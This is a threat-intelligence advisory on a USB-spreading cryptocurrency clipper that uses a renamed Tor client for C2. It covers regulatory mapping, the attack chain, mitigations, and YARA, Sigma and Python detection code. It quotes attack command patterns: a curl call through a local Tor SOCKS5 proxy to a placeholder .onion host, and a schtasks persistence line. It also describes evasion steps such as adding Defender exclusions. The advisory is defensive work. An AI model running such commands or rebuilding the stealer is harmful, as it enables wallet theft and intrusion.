
Crypto Clipper uses Tor and worm-like propagation for persistence and control

Jeff Davies 18 Jun 2026 9 min read

1. Executive summary

Microsoft Threat Intelligence has documented a Windows-based cryptocurrency clipper ("CryptoBandits") active since February 2026 that propagates via malicious .lnk shortcuts on USB media and uses a bundled, renamed Tor client (ugate.exe) over a local SOCKS5 proxy (localhost:9050) to reach hidden-service .onion C2. The stealer monitors the clipboard roughly every 500 ms, harvests BIP39 seed phrases (12/24-word), Bitcoin WIF and Ethereum keys, swaps copied wallet addresses for attacker-controlled ones, exfiltrates five timed screenshots, and supports an EVAL command that executes attacker-supplied code at runtime — converting a financially motivated stealer into a lightweight backdoor. EMEA financial services firms handling crypto treasury, trading desks, or retail wallet operations face direct monetary-loss risk; back-office and developer endpoints are exposed to follow-on intrusion via the runtime EVAL channel. No CVE is associated with this campaign; the threat is delivered via removable-media social engineering rather than software exploitation.

2. Regulatory framing

DORA Art. 18 — classification of ICT-related incidents and cyber threats
  Trigger (fact in this item): The threat is a documented, named malware family with confirmed clipboard-theft and remote-execution capability affecting financial endpoints.
  Practical impact: Financial entities must classify any confirmed compromise as an ICT-related incident and cyber threat per their internal taxonomy; severity tiering should reflect direct monetary loss potential and the EVAL remote-execution capability.

DORA Art. 17 — ICT-related incident management process
  Trigger (fact in this item): Confirmed incidents require documented detection, containment, eradication and recovery workflows.
  Practical impact: Activate the incident management process on any confirmed hit: triage chain (EDR → SOC → CISO), evidence preservation, eradication steps (see §4), and post-incident review.

DORA Art. 19 — reporting of major ICT-related incidents to competent authorities
  Trigger (fact in this item): A confirmed compromise with monetary loss or service impact meets the "major" threshold under DORA reporting criteria.
  Practical impact: If a confirmed incident causes financial loss, service disruption, or affects critical operations, the entity must report to its competent authority within DORA-prescribed timelines (initial notification, intermediate, final).

DORA Art. 28 — ICT third-party risk — general principles
  Trigger (fact in this item): USB-borne initial access relies on third-party-supplied removable media and hardware.
  Practical impact: Treat USB/removable-media use as a third-party risk vector; enforce device-control policy, scan removable media on insertion, and record chain-of-custody for any USB in scope.

DORA Art. 29 — preliminary assessment of ICT concentration risk
  Trigger (fact in this item): The bundled Tor client (ugate.exe) and .onion C2 represent a single-vendor/single-channel concentration for both tooling and exfiltration.
  Practical impact: Include Tor/SOCKS5 egress paths and .onion resolution in concentration-risk assessments; flag any endpoint segment that lacks egress controls as high concentration.

NIS2 Art. 21(2)(d) — supply chain security measures
  Trigger (fact in this item): The threat enters via the hardware supply chain (USB devices) carrying weaponised .lnk shortcuts.
  Practical impact: Apply supply-chain controls to removable media: provenance verification, scanning on mount, and user-awareness controls for unsolicited USB devices.

NIS2 Art. 23 — incident reporting obligations
  Trigger (fact in this item): A confirmed incident with impact on service continuity triggers early warning / incident notification.
  Practical impact: Ensure in-scope entities have an early-warning pathway ready within 24 h of detection and a full notification within 72 h if the incident is significant.

UK NIS 2018 — OES/RDSP duties
  Trigger (fact in this item): Operators of essential services in the UK financial sector handling crypto or payment services are in scope.
  Practical impact: UK OES/RDSP entities must apply the same incident-management and reporting discipline as above under the UK NIS regime.

3. Technical analysis & attack chain

  1. Initial access (USB-borne .lnk). Victim inserts a USB device containing malicious shortcut files. The worm scans for .doc, .xlsx, .pdf and other common document types, hides the originals, and creates .lnk shortcuts with the same names that masquerade as the original documents. The .lnk arguments point to the staged worm executable; the user is unaware they are launching an executable.
  2. Worm execution and payload staging. On click, the staged worm runs. It checks for an existing infection marker and stops if already infected; otherwise it fetches the payload from C2 over Tor. It excludes staging folders and Windows binaries used by the stealer from Defender scanning (MITRE: Defense Evasion — Process/Path Exclusion).
  3. Drop and persistence. Decrypted payloads (two obfuscated JavaScript files) are dropped under C:\Users\Public\Documents\<5-char-folder>\ using a five-character naming convention for both the subfolder and the script names. Two indefinite scheduled tasks are created — one for USB propagation, one for the stealer — using XML task definitions under the same five-character folder.
  4. Anti-analysis gate. The clipper queries the Win32_Process WMI class; if Task Manager is detected, the malware exits. Otherwise it launches ugate.exe (renamed portable Tor) in a hidden window and waits ~60 seconds for Tor bootstrap.
  5. C2 registration and polling. A victim GUID is generated and the device registers with a hidden-service .onion C2. The malware enters a continuous loop polling for instructions.
  6. Clipboard theft. The clipboard is inspected roughly every 500 ms. The malware detects 12- or 24-word BIP39 seed phrases, Bitcoin WIF keys, and Ethereum keys. Captured values are validated against a word list, saved locally as a backup, and exfiltrated to C2 via Tor. Local backups are deleted after successful acknowledgement.
  7. Address substitution. Copied cryptocurrency addresses are replaced with attacker-controlled addresses (validated as alphanumeric).
  8. Screenshot capture. Five screenshots are taken at ten-second intervals and uploaded asynchronously through Tor to provide wallet/balance context.
  9. Remote tasking / RCE. If the C2 returns an EVAL response, the malware executes attacker-supplied code at runtime — converting the stealer into a backdoor.
  10. Propagation. The worm component re-arms on each new USB insertion, repeating the cycle.

Technical specifics that matter to a defender

  • Script engine abuse. Execution is via WScript / CScript with ActiveXObject; the JavaScript payloads carry dual-layer obfuscation. The Python installer is obfuscated with PyArmor and packaged via PyInstaller.
  • Tor binary. ugate.exe is a renamed portable Tor client launched in a hidden window. All C2 traffic is proxied through 127.0.0.1:9050 (SOCKS5) and resolves .onion destinations inside Tor — eliminating DNS visibility for the C2 hostname.
  • Persistence mechanism. Scheduled tasks created via schtasks.exe /create /tn <4–6 char> /xml C:\Users\Public\Documents\<4–6 char>\<4–6 char>.xml /f — a distinctive pattern.
  • Exfiltration channel. curl.exe invoked with --socks5-hostname localhost:9050 against .onion destinations.
  • Defender exclusions. The malware adds Defender exclusions for its staging folder and for Windows binaries used in the stealer chain.
  • Detection names (Microsoft). AV: Trojan:Win32/CryptoBandits.A, Trojan:Win32/CryptoBandits.B, Trojan:JS/CryptoBandits.A, Trojan:JS/CryptoBandits.B. Behaviour: Behavior:Win64/PyPowJs.STA, Behavior:Win64/ProcessExclusion.ST, Behavior:Win64/PathExclusion.STA, Behavior:Win64/PathExclusion.STB, Behavior:Win64/CurlOnion.STA. EDR: "Suspicious JavaScript process", "Suspicious Python library load", "Suspicious behavior by cmd.exe", "Suspicious Task Scheduler activity", "Possible data exfiltration using curl".
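The three process-level artefacts above (the schtasks /xml pattern with 4–6-character names, curl through the local Tor SOCKS5 port to a .onion host, and the renamed ugate.exe binary) can be triaged from exported process-creation telemetry. The script below is an added example written for this advisory, not tooling from Microsoft or Adverse Trace; the log export format, the folder name kqzxv and the .onion address are constructed placeholders.

```python
import re

# Constructed process-creation records in a "key=value|key=value" export
# format (not telemetry from the Microsoft report). The .onion address and
# the 5-character folder name are placeholders.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\schtasks.exe|CommandLine=schtasks /create /tn kqzxv /xml C:\Users\Public\Documents\kqzxv\kqzxv.xml /f|Parent=wscript.exe",
    r"Image=C:\Windows\System32\schtasks.exe|CommandLine=schtasks /create /tn BackupJob /xml C:\ProgramData\Backup\job.xml /f|Parent=explorer.exe",
    r"Image=C:\Windows\System32\curl.exe|CommandLine=curl.exe --socks5-hostname localhost:9050 http://placeholder-c2.onion/reg|Parent=wscript.exe",
    r"Image=C:\Windows\System32\curl.exe|CommandLine=curl.exe --socks5-hostname 127.0.0.1:9050 http://placeholder-c2.onion/poll|Parent=cscript.exe",
    r"Image=C:\Windows\System32\curl.exe|CommandLine=curl.exe -sL https://example.com/update.json|Parent=cmd.exe",
    r"Image=C:\Users\Public\Documents\kqzxv\ugate.exe|CommandLine=ugate.exe|Parent=wscript.exe",
]

# The report gives the task, folder and script names as 4-6 characters.
SHORT = r"[A-Za-z0-9]{4,6}"

RULES = {
    # Persistence: schtasks /create /tn <short> /xml C:\Users\Public\Documents\<short>\<short>.xml /f
    "schtasks_public_documents": re.compile(
        rf"schtasks(?:\.exe)?\s+/create\s+/tn\s+{SHORT}\s+/xml\s+"
        rf"C:\\Users\\Public\\Documents\\{SHORT}\\{SHORT}\.xml\s+/f\b",
        re.IGNORECASE,
    ),
    # C2/exfiltration: curl through the local Tor SOCKS5 port to a hidden service
    "curl_tor_socks5": re.compile(
        r"--socks5-hostname\s+(?:localhost|127\.0\.0\.1):9050\b.*\.onion",
        re.IGNORECASE,
    ),
    # Renamed portable Tor client launched by the clipper
    "renamed_tor_binary": re.compile(r"(?:^|\\)ugate\.exe\b", re.IGNORECASE),
}


def parse_event(line: str) -> dict:
    """Split one 'key=value|key=value' record into a dict."""
    return dict(part.split("=", 1) for part in line.split("|"))


def triage(lines) -> list:
    """Return (rule_name, command_line) pairs for every record that matches a rule."""
    hits = []
    for line in lines:
        event = parse_event(line)
        # Match on image path plus command line so ugate.exe is caught either way.
        haystack = f"{event.get('Image', '')} {event.get('CommandLine', '')}"
        for name, pattern in RULES.items():
            if pattern.search(haystack):
                hits.append((name, event.get("CommandLine", "")))
    return hits


if __name__ == "__main__":
    for name, cmdline in triage(SAMPLE_EVENTS):
        print(f"[{name}] {cmdline}")
```

The schtasks pattern is deliberately tighter than the Sigma rule in §6: it enforces the 4–6-character name constraint, so a legitimate task with a longer name in a different path is not flagged.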

Caveats

  • The source does not attribute the campaign to a named threat actor; treat any attribution as unconfirmed.
  • The source does not specify which wallet applications are targeted beyond generic BIP39/Ethereum/Bitcoin-WIF patterns.
  • The source does not state the geographic distribution of victims or the size of the campaign.

4. Mitigation & containment

P1 — within 24 hours (containment)

  1. Block Tor egress. Note that 127.0.0.1:9050 is the loopback SOCKS5 listener of the bundled Tor client, so it is a host-level control (host firewall or EDR policy stopping unapproved processes from connecting to that port) rather than something a perimeter firewall sees; at the perimeter, deny outbound 9001/9030/9051 (Tor relay/directory) from endpoint segments. Where Tor egress is not business-justified, block .onion resolution and known Tor guard relays.
  2. Disable removable-media autorun and restrict USB. Apply device-control policy: block execution from USB; require signed/approved removable media only; quarantine any USB inserted on systems handling crypto wallets.
  3. Hunt for ugate.exe and the staging path. Sweep endpoints for ugate.exe and any folder matching C:\Users\Public\Documents\<4–6 char>\ containing <4–6 char>.xml task definitions and <4–6 char>.js payloads.
  4. Isolate suspect endpoints via EDR; preserve volatile evidence (process tree, scheduled tasks, clipboard state) before reimage.
  5. Audit scheduled tasks for the distinctive schtasks /create /tn <4–6 char> /xml C:\Users\Public\Documents\<4–6 char>\<4–6 char>.xml /f pattern; remove any matches.
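Steps 3 and 5 can be scripted for a local sweep. The helper below is an added example written for this advisory (not Microsoft or Adverse Trace tooling): it walks a Public\Documents tree for 4–6-character folders holding a <short>.xml task definition together with a <short>.js payload, or the renamed ugate.exe, and builds a constructed fixture in a temporary directory to show what gets flagged and what does not.

```python
import re
import tempfile
from pathlib import Path

# The report gives folder, task and script names as 4-6 characters.
SHORT_NAME = re.compile(r"^[A-Za-z0-9]{4,6}$")


def sweep_staging(public_documents: Path) -> list:
    """Return one finding per short-named folder under public_documents that holds
    a <short>.xml task definition together with a <short>.js payload, or ugate.exe."""
    findings = []
    for folder in sorted(public_documents.iterdir()):
        if not folder.is_dir() or not SHORT_NAME.match(folder.name):
            continue
        files = [f for f in folder.iterdir() if f.is_file()]
        task_xml = sorted(f.name for f in files if f.suffix.lower() == ".xml" and SHORT_NAME.match(f.stem))
        payload_js = sorted(f.name for f in files if f.suffix.lower() == ".js" and SHORT_NAME.match(f.stem))
        tor_binary = [f.name for f in files if f.name.lower() == "ugate.exe"]
        # A short-named folder alone is not evidence; require the staging pair or the Tor binary.
        if (task_xml and payload_js) or tor_binary:
            findings.append({
                "folder": str(folder),
                "task_xml": task_xml,
                "payload_js": payload_js,
                "tor_binary": tor_binary,
            })
    return findings


def build_demo_tree(root: Path) -> Path:
    """Constructed fixture imitating C:\\Users\\Public\\Documents; contents are placeholders."""
    docs = root / "Users" / "Public" / "Documents"
    staged = docs / "kqzxv"                       # staging folder (placeholder name)
    staged.mkdir(parents=True)
    (staged / "kqzxv.xml").write_text("<Task/>")  # stands in for the task XML definition
    (staged / "kqzxv.js").write_text("// js")     # stands in for the obfuscated script
    (staged / "ugate.exe").write_bytes(b"MZ")     # stands in for the renamed Tor client
    notes = docs / "Notes"                        # benign short-named folder: not flagged
    notes.mkdir()
    (notes / "todo.txt").write_text("buy milk")
    reports = docs / "Reports"                    # benign folder with a long name: skipped
    reports.mkdir()
    (reports / "Q1.xml").write_text("<Report/>")
    return docs


def run_demo() -> list:
    """Build the fixture in a temporary directory and sweep it."""
    with tempfile.TemporaryDirectory() as tmp:
        return sweep_staging(build_demo_tree(Path(tmp)))


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

On a live host, point sweep_staging at C:\Users\Public\Documents and cross-check each flagged folder against the task list from schtasks /query before removal.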

P2 — within 72 hours (remediation)

  1. Apply Microsoft Defender detections (where licensed): ensure Trojan:Win32/CryptoBandits.* and Trojan:JS/CryptoBandits.* signatures are current; enable ASR rules for obfuscated scripts and suspicious child-process chains.
  2. Remove Defender exclusions added by the malware for staging folders and Windows binaries; revert any unauthorised Defender exclusions to policy defaults.
  3. Rotate any wallet material that may have been exposed on a confirmed-infected host (seed phrases, private keys, hot-wallet credentials). Treat any wallet active on an infected host as compromised.
  4. Restrict curl.exe via AppLocker/Windows Defender Application Control unless business-justified; because those controls match on the binary rather than its arguments, pair them with an EDR or Sigma alert on --socks5-hostname invocations (see §6).
  5. Review clipboard and address-substitution telemetry on suspect hosts; check transaction history on any wallet used during the infection window for unauthorised transfers.

P3 — within 7 days (hardening)

  1. Restrict script interpreters (WScript, CScript, mshta, powershell) via ASR; require Constrained Language Mode for PowerShell where feasible.
  2. Deploy or tune a SOCKS5-on-localhost detection (see §6 Sigma rule) and alert on curl/wget/PowerShell with --socks5-hostname or .onion arguments.
  3. User awareness brief on unsolicited USB devices and on the risk of .lnk files masquerading as documents.
  4. Threat-intel feed update with the IOCs in §5 across EDR, NDR, SIEM and email/web gateways.
  5. Vendor / supply-chain review of any USB media in circulation; trace provenance and quarantine suspect batches.

5. Indicators of compromise

Type Value Confidence Source
filename ugate.exe High Microsoft (portable Tor binary)

6. Detection

YARA rule

rule AT_CryptoClipper_TorWorm_2026
{
    meta:
        author = "Adverse Trace"
        date = "2026-06-18"
        description = "Detects Crypto Clipper (CryptoBandits) worm and stealer components based on Tor binary name, .onion C2 usage, and distinctive staging path/scheduled-task pattern."
        reference = "https://www.microsoft.com/en-us/security/blog/2026/06/17/crypto-clipper-uses-tor-worm-like-propagation-for-persistence-control/"

    strings:
        // Renamed portable Tor client dropped by the worm; strong enough to fire alone.
        $tor_bin = "ugate.exe" ascii wide nocase
        // Supporting artefacts; each is generic on its own, so the condition needs two of them.
        $onion_ext = ".onion" ascii wide nocase
        $socks_arg = "--socks5-hostname" ascii wide nocase
        $socks_proxy = "localhost:9050" ascii wide nocase
        $staging_path = "C:\\Users\\Public\\Documents\\" ascii wide nocase
        $schtasks_pat = "schtasks /create /tn " ascii wide nocase
        $schtasks_xml = "/xml C:\\Users\\Public\\Documents\\" ascii wide nocase
        // Short marker string; low specificity, counts only toward the 2-of threshold.
        $good_path = "GOOD" ascii wide

    condition:
        $tor_bin or
        2 of ($onion_ext, $socks_arg, $socks_proxy, $staging_path, $schtasks_pat, $schtasks_xml, $good_path)
}

Sigma rules

title: Tor-Routed Curl Execution via Local SOCKS5 Proxy
id: 8c1f4a3e-2d6b-4f1a-9c7e-1a2b3c4d5e6f
status: experimental
description: |
    Detects curl.exe being invoked with --socks5-hostname against the local Tor
    SOCKS5 port (localhost:9050 or 127.0.0.1:9050), a strong indicator of
    Crypto Clipper (CryptoBandits) C2/exfiltration over Tor.
author: Adverse Trace
date: 2026-06-18
references:
    - https://www.microsoft.com/en-us/security/blog/2026/06/17/crypto-clipper-uses-tor-worm-like-propagation-for-persistence-control/
logsource:
    product: windows
    category: process_creation
detection:
    selection_img:
        Image|endswith: '\curl.exe'
    selection_socks:
        CommandLine|contains: '--socks5-hostname'
    selection_proxy:
        CommandLine|contains:
            - 'localhost:9050'
            - '127.0.0.1:9050'
    condition: all of selection_*
fields:
    - User
    - Computer
    - CommandLine
    - ParentCommandLine
level: high
tags:
    - attack.command_and_control
    - attack.exfiltration
    - attack.t1090
    - attack.t1041
---
title: Suspicious Scheduled Task Creation in Public Documents (Crypto Clipper Pattern)
id: 7b2e5d4c-3a1f-4b8d-9e2c-5f6a7b8c9d0e
status: experimental
description: |
    Detects schtasks.exe creating a task whose XML definition lives under
    C:\Users\Public\Documents\<short>\ — the persistence pattern used by the
    Crypto Clipper worm and stealer components.
author: Adverse Trace
date: 2026-06-18
references:
    - https://www.microsoft.com/en-us/security/blog/2026/06/17/crypto-clipper-uses-tor-worm-like-propagation-for-persistence-control/
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith: '\schtasks.exe'
        CommandLine|contains|all:
            - '/create'
            - '/tn'
            - '/xml'
            - 'C:\Users\Public\Documents\'
            - '.xml'
            - '/f'
    condition: selection
fields:
    - User
    - Computer
    - CommandLine
level: high
tags:
    - attack.persistence
    - attack.t1053.005

7. Sources

  • Microsoft Threat Intelligence — Crypto Clipper uses Tor and worm-like propagation for persistence and control — https://www.microsoft.com/en-us/security/blog/2026/06/17/crypto-clipper-uses-tor-worm-like-propagation-for-persistence-control/ — 2026-06-17

8. Adverse Trace position

This is a financially motivated stealer with a built-in remote-execution channel, not a destructive worm — but the EVAL tasking converts clipboard theft into a foothold for follow-on intrusion, which raises impact beyond the immediate crypto loss. Severity for EMEA financial services is High for any endpoint that handles wallet material (treasury, trading, retail on-ramps, dev/ops working with hot wallets) and Medium elsewhere, given the removable-media vector and the ease of address substitution. Clients should prioritise the P1 containment steps (Tor egress block, USB restriction, hunt for ugate.exe and the C:\Users\Public\Documents\<short>\ staging path) within 24 hours and treat any wallet active on a confirmed-infected host as compromised. Adverse Trace will monitor for new .onion infrastructure, additional worm hashes, and any actor attribution; we will update this advisory if a named threat actor is confirmed or if the campaign broadens beyond USB-borne initial access.



Published via PulseTrace — Adverse Trace threat intelligence.
